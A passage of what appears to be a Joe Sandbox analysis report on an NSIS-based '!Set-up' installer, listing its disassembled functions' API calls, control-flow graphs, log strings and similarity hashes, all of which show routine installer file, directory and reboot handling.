                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                              • String ID: New install of "%s" to "%s"${
                                                              • API String ID: 2110491804-1641061399
                                                              • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                              • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                              Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                              APIs
                                                              • #17.COMCTL32 ref: 004038CE
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                              • API String ID: 2435955865-3712954417
                                                              • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                              • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                              Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 587 406831-40683c 588 40683e-40684d 587->588 589 40684f-406863 587->589 588->589 590 406865-406872 589->590 591 40687b-406881 589->591 590->591 592 406874-406877 590->592 593 406887-406888 591->593 594 406aad-406ab6 591->594 592->591 597 406889-406896 593->597 595 406ac1-406ac2 594->595 596 406ab8-406abc call 406035 594->596 596->595 599 406aab-406aac 597->599 600 40689c-4068ac 597->600 599->594 601 4068b2-4068b5 600->601 602 406a86 600->602 603 406a89 601->603 604 4068bb-4068f9 601->604 602->603 605 406a99-406a9c 603->605 606 406a8b-406a97 603->606 607 406a19-406a22 604->607 608 4068ff-40690a GetVersion 604->608 611 406a9f-406aa5 605->611 606->611 609 406a24-406a27 607->609 610 406a5b-406a64 607->610 612 406928 608->612 613 40690c-406914 608->613 617 406a37-406a46 call 406035 609->617 618 406a29-406a35 call 405f7d 609->618 615 406a72-406a84 lstrlenW 610->615 616 406a66-406a6d call 406831 610->616 611->597 611->599 614 40692f-406936 612->614 613->612 619 406916-40691a 613->619 621 406938-40693a 614->621 622 40693b-40693d 614->622 615->611 616->615 626 406a4b-406a51 617->626 618->626 619->612 625 40691c-406920 619->625 621->622 627 406979-40697c 622->627 628 40693f-406965 call 405eff 622->628 625->612 630 406922-406926 625->630 626->615 631 406a53-406a59 call 406064 626->631 633 40698c-40698f 627->633 634 40697e-40698a GetSystemDirectoryW 627->634 641 406a05-406a09 628->641 642 40696b-406974 call 406831 628->642 630->614 631->615 638 406991-40699f GetWindowsDirectoryW 633->638 639 4069fb-4069fd 633->639 637 4069ff-406a03 634->637 637->631 637->641 638->639 639->637 643 4069a1-4069ab 639->643 641->631 645 406a0b-406a17 lstrcatW 641->645 642->637 646 4069c5-4069db SHGetSpecialFolderLocation 643->646 647 4069ad-4069b0 643->647 645->631 649 4069f6-4069f8 646->649 650 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 646->650 647->646 648 4069b2-4069b9 647->648 652 4069c1-4069c3 648->652 649->639 650->637 650->649 652->637 652->646
                                                              APIs
                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406A73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 3581403547-1792361021
                                                              • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                              • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                              Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: jF
                                                              • API String ID: 2295610775-3349280890
                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                              Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                              • String ID:
                                                              • API String ID: 310444273-0
                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                              Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                              APIs
                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                              • ShowWindow.USER32(?), ref: 00401753
                                                              • ShowWindow.USER32(?), ref: 00401767
                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                              Strings
                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                              • BringToFront, xrefs: 004016BD
                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                              • Rename: %s, xrefs: 004018F8
                                                              • Sleep(%d), xrefs: 0040169D
                                                              • Aborting: "%s", xrefs: 0040161D
                                                              • Jump: %d, xrefs: 00401602
                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                              • Rename failed: %s, xrefs: 0040194B
                                                              • Rename on reboot: %s, xrefs: 00401943
                                                              • detailprint: %s, xrefs: 00401679
                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                              • Call: %d, xrefs: 0040165A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                              • API String ID: 2872004960-3619442763
                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                              Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
